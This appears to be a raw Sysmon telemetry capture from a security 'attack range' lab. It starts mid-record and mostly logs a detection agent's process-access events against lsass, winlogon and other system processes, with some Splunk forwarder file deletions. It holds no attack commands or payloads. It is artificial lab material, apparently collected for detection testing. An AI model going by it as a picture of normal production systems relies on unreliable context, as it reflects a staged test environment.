Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1100-00000000AF02}492C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040804Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:51.768{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040803Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:51.758{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0F00-00000000AF02}304C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040802Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:51.751{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0E00-00000000AF02}1004C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040801Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:51.743{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040800Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:51.735{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040799Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:51.697{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000040798Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:51.696{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0900-00000000AF02}564C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 23542300x800000000000000040797Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:51.207{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5174D217F7E3E4CF1C4F4F825A338B82,SHA256=860E65D906349EF04B27FB6D3553CA4C0C780A5B95E4CEE9054D87EC3518E460,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015639Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:52.618{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD9191160E6EA40C0DC4FEE47CA5DF61,SHA256=01BE8BE1ED385BDF94E546B338F74201A72EEB01C28CCB03DF95C35833EA38EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040827Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:52.651{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FAEB98406131B7779A1601D4A7C24B7C,SHA256=4D0A52CD58959AB1D88BCD0B79DF5B2DF59305DE911502968AA3F83EF998FD18,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000040826Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:50.522{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56254-false10.0.1.12-8000- 10341000x800000000000000040825Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:52.179{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2900-00000000AF02}2712C:\Windows\system32\dfssvc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 23542300x800000000000000015640Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:53.693{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A5839CF4644BEDC66937C7223BEABAE4,SHA256=927DDB21E7E6EBFA0FE323D7D769940790E3C2CC600F339CF19F7795FAA9C2C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040828Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:53.659{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F4F48EDAC9B976DF2312B3F8BC3F7102,SHA256=8C266CFF7F1B3C608667C937763093BD4EE50A888AB0BBFC8ED631F39E8BF8E8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015641Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:54.765{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A81AE2D895A48018903F5E7DF1E28A9,SHA256=D2E70D475D01B89CCD90505AEFEB96017C9A046E178D33066E6A8CF28C9759D4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000040857Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:54.787{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040856Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:54.787{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E317-63C7-ED05-00000000AF02}6268C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040855Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:54.786{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5E05-00000000AF02}5280C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040854Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:54.786{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5D05-00000000AF02}4176C:\Windows\system32\cmd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040853Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:54.784{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E02A-63C7-4705-00000000AF02}4708C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040852Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:54.777{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040851Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:54.765{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040850Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:54.738{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040849Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:54.732{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B504-00000000AF02}1332C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040848Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:54.723{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B104-00000000AF02}5076C:\Windows\System32\rdpclip.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040847Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:54.718{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF5-63C7-A404-00000000AF02}4616C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040846Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:54.716{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF4-63C7-A104-00000000AF02}4952C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 23542300x800000000000000040845Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:54.714{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3880466F4358BA18061C3F7ECA5564D,SHA256=8888506CD8A109727F4636DA4EB8ABFD3D11DF18D492B74FF06AB87469C997A7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000040844Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:54.713{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA7E-63C7-F900-00000000AF02}4844C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040843Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:54.710{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA75-63C7-F400-00000000AF02}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040842Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:54.707{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040841Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:54.706{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AE00-00000000AF02}4912C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040840Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:54.703{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040839Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 